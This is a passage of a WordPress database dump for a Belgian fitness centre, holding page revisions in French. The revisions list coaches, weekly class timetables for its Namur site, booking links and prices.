class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Chloé Chmiel</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Master en kinésithérapie</li>\r\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\r\n	<li>Kiné Nat.3 basket de Belgrade</li>\r\n	<li>Pratiquante de course à pied et danses sportives</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-402\" alt=\"julie_rogge_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/julie_rogge_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Rogge</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Licence en Education Physique</li>\r\n	<li>Spécialisation en préparation physique et entrainement du sportif</li>\r\n	<li>Enseignante en éducation physique</li>\r\n	<li>Entraîneur de volley-ball</li>\r\n	<li>Pratiquant de volley-ball, natation et course à pied</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-11-24 08:41:15', '2013-11-24 08:41:15', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(406, 1, '2014-12-15 19:47:31', '2014-12-15 19:47:31', '<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"sousmenuhoover\">\n<div align=\"center\">\n\nNamur\n\n</div>\n</div></td>\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"sousmenu\">\n<div align=\"center\">\n\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\n\n</div>\n</div></td>\n</tr>\n</tbody>\n</table>\n<h1></h1>\n<h1>Small Group Training - Namur :</h1>\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\n\n&nbsp;\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<td class=\"ttitreh\">Heure</td>\n<td class=\"ttitreh\">LUNDI</td>\n<td class=\"ttitreh\">MARDI</td>\n<td class=\"ttitreh\">MERCREDI</td>\n<td class=\"ttitreh\">JEUDI</td>\n<td class=\"ttitreh\">VENDREDI</td>\n</tr>\n<tr style=\"background-color: #fafafa;\">\n<td class=\"tvide\">16h45</td>\n<td class=\"tvide\">-</td>\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\n<td class=\"tvide\">-</td>\n<td class=\"tvide\">-</td>\n<td class=\"tvide\">-</td>\n</tr>\n<tr style=\"background-color: #eeeeee;\">\n<td class=\"tvide\">17h30</td>\n<td class=\"tcircuit\">Circuit Training</td>\n<td class=\"tcircuit\">Circuit Training</td>\n<td class=\"tcircuit\">Circuit Training</td>\n<td class=\"tcore\">Core</td>\n<td class=\"ttrx\">TRX</td>\n</tr>\n<tr style=\"background-color: #fafafa;\">\n<td class=\"tvide\">18h15</td>\n<td class=\"tvide\">Réservé Squash</td>\n<td class=\"tcircuit\">Circuit Training</td>\n<td class=\"tforce\">Force</td>\n<td class=\"tcircuit\">Circuit Training</td>\n<td class=\"tcircuit\">Circuit Training</td>\n</tr>\n<tr style=\"background-color: #eeeeee;\">\n<td class=\"tvide\">19h00</td>\n<td class=\"tcircuit\">Circuit Training</td>\n<td class=\"ttrx\">TRX</td>\n<td class=\"tcircuit\">Circuit Training</td>\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\n<td class=\"tvide\">-</td>\n</tr>\n<tr style=\"background-color: #eeeeee;\">\n<td class=\"tvide\">19h45</td>\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\n<td class=\"tcircuit\">Circuit Training</td>\n<td class=\"tvide\">Réservé Foot</td>\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\n<td class=\"tvide\">-</td>\n</tr>\n<tr style=\"background-color: #eeeeee;\">\n<td class=\"tvide\">20h30</td>\n<td class=\"tvide\">-</td>\n<td class=\"tvide\">Duo Training</td>\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\n<td class=\"tvide\">Duo Training</td>\n<td class=\"tvide\">-</td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\n\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\n\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\n\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\n\n&nbsp;\n<h1></h1>\n<h2>Réservation des séances :</h2>\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\n<h1></h1>\n<h2>Duo Training - Namur :</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\nEntrainements à deux personnes sous la supervision d’un coach.\n<h1></h1>\n<h2>Personal Training - Namur :</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\nUn coach par personne, l’idéal pour progresser plus rapidement!\n<h1></h1>\n<h2>Coaching nutritionnel - Namur :</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\nRendez-vous avec une diététicienne pour améliorer votre santé.\n<h1></h1>\n<h2>Prix</h2>\n<table>\n<tbody>\n<tr>\n<td class=\"ttitrehprix\">Séance Booster</td>\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Personal Training</td>\n<td class=\"tcelluleprix\">60 min : 60.00€\n30 min : 35.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Duo Training</td>\n<td class=\"tcelluleprix\">60 min : 35.00€\n30 min : 20.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Small Group Training</td>\n<td class=\"tcelluleprix\">1 séance : 10.00€\n1 carte de 10 séances : 90.00€ (valable 6 mois)\n1 carte de 20 séances : 150.00€ (valable 6 mois)\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Préparation physique</td>\n<td class=\"tcelluleprix\">1 séance : 40.00€\nSéance de 30 min orientée sur les spécificités du sport</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\nSuivi 15,00€</td>\n</tr>\n</tbody>\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-autosave-v1', '', '', '2014-12-15 19:47:31', '2014-12-15 19:47:31', '', 363, 'http://www.crosstrainingcenter.be/363-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(407, 1, '2014-01-18 18:52:33', '2014-01-18 18:52:33', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h45</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 18:52:33', '2014-01-18 18:52:33', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(408, 1, '2014-01-18 18:55:39', '2014-01-18 18:55:39', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h45</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 18:55:39', '2014-01-18 18:55:39', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(409, 1, '2014-01-18 18:59:25', '2014-01-18 18:59:25', '', 'zumba3', '', 'inherit', 'open', 'open', '', 'zumba3', '', '', '2014-01-18 18:59:25', '2014-01-18 18:59:25', '', 363, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg', 0, 'attachment', 'image/jpeg', 0),
(412, 1, '2014-01-18 19:01:49', '2014-01-18 19:01:49', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nZumba</td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h45</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 19:01:49', '2014-01-18 19:01:49', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
